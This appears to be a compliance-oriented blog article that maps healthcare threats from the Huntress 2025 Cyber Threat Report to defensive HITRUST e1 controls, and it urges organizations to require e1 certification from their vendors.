Takeaways
- Healthcare remains a top target for cyberattacks: Cybercriminals are intensifying attacks against healthcare organizations due to valuable patient data and outdated systems.
- Vendors are the new attack vector: Even the most secure organizations can be compromised through a trusted third party.
- HITRUST e1 provides proven protection: The HITRUST e1 offers a pragmatic, standardized way to verify that both organizations and their vendors have implemented critical cybersecurity controls to prevent, detect, and respond to today’s most prevalent threats.
Overview
The Huntress 2025 Cyber Threat Report analyzes attacks observed in 2024, showing that cybercriminals are repurposing sophisticated techniques for small and mid‑sized organizations. Healthcare was hit particularly hard because it holds valuable patient data and often relies on outdated systems. Threat actors frequently used malicious scripts, remote access Trojans (RATs), remote‑monitoring tool abuse, and ransomware. These patterns highlight the need for comprehensive security measures across the entire supply chain. One major risk associated with these attacks is that the threat actor may compromise enterprise systems via a third party. For example, any of your hundreds of software providers may be compromised by these attacks and used as a stepping stone into your customers’ environments.
Key threats and relevant e1 controls
Malicious scripts and fileless malware
- What Huntress saw: Malicious script executions were the most common attack vector in healthcare. Attackers used PowerShell or JavaScript to persist on hosts, modify the Windows Registry, or download additional malware.
- e1 controls: Deploy endpoint protection tools that can detect and block script‑based attacks and fileless malware. Enforce default‑deny rules on host‑based firewalls to prevent unauthorized outbound connections. Keep systems patched and configurations hardened to reduce exploitable vulnerabilities. Prohibit installation of unauthorized software and disable auto‑run features to limit untrusted code execution. Perform regular vulnerability scans and implement an incident response plan to catch and remediate malicious activity quickly.
Infostealers and credential harvesting
- What Huntress saw: Infostealers targeted healthcare to extract PHI and credentials. More than 38 % of hands‑on‑keyboard activity involved network or domain reconnaissance, and attackers used tools such as Mimikatz to dump cached credentials.
- e1 controls: Enforce strong password policies and change default credentials on all systems. Require multi‑factor authentication for privileged accounts and remote access to limit the impact of stolen passwords. Review account privileges regularly, limit administrative rights, and use separate accounts for administrative duties. Enable comprehensive logging and protect audit trails to support investigation of credential misuse. Provide ongoing security awareness and phishing‑resistance training so staff recognize and report credential‑stealing attempts.
Ransomware, data theft, and extortion
- What Huntress saw: Ransomware in healthcare shifted toward data theft and extortion. Attackers combined data exfiltration with encryption to coerce victims, and the rise in cryptocurrency prices emboldened them.
- e1 controls: Maintain offline or immutable backups and test restoration procedures regularly. Establish a robust incident response capability that includes detection, containment, and recovery. Limit access to sensitive data to authorized personnel and encrypt data on mobile devices. Use email and web‑filtering technologies to block phishing emails and connections to known malicious domains.
Remote Access Trojans (RATs) and RMM abuse
- What Huntress saw: Attackers deployed Java‑based RATs (such as JRat and Adwind) and abused legitimate remote monitoring tools.
- e1 controls: Secure remote access with multi‑factor authentication and restrict the use of remote administration tools to authorized solutions. Segment networks with firewalls to separate internal systems from external networks and limit lateral movement. Maintain an accurate inventory of IT assets and forbid installation of unauthorized software, including unauthorized RMM tools. Configure devices to log off idle sessions automatically and assign unique user accounts to all personnel.
Lateral movement and network enumeration
- What Huntress saw: Attackers spent significant time mapping networks and domains. They used toolkits (e.g., ntdsutil, diskshadow) to dump credentials and move laterally, often exploiting legacy systems.
- e1 controls: Apply least‑privilege principles; only authorized individuals should have administrative rights, and privileged activities should be logged and reviewed. Use network segmentation and host‑based firewalls to restrict inter‑segment traffic and make lateral movement more difficult. Perform regular asset inventories and vulnerability scans to identify legacy systems and misconfigurations. Enforce change‑control procedures and maintain baseline configurations to prevent unauthorized changes. Collect and retain audit logs so lateral movement can be detected and investigated.
Why vendor compliance with e1 requirements matters
The Huntress report shows that attackers exploit weaknesses not just in their primary targets but also in connected systems. Vendors often have direct network access or handle sensitive data on behalf of clients. If a vendor neglects patching, uses weak credentials, or does not enforce multi‑factor authentication, it can become the entry point for the same malicious scripts, infostealers, or remote‑access abuse described above.
Requiring vendors to adhere to the e1 requirements offers assurance that they implement comprehensive controls across governance, technical, and operational domains. These controls include endpoint security, firewalls, strong authentication, least‑privilege access, incident response, and employee training. Mandating an e1 certification in vendor contracts reduces third‑party risk, demonstrates due diligence, and aligns the entire ecosystem to best practices.
Conclusion
The 2025 Huntress report underscores the evolving threats facing healthcare organizations, from malicious scripts and infostealers to ransomware and lateral movement. The e1 requirements provide a structured set of practices that collectively mitigate these threats by addressing technical vulnerabilities, human factors, and incident response readiness. Organizations should not only implement these controls internally but also require their vendors to meet them. Doing so builds a resilient defense that protects patient data and ensures continuity of care in the face of an increasingly aggressive threat landscape.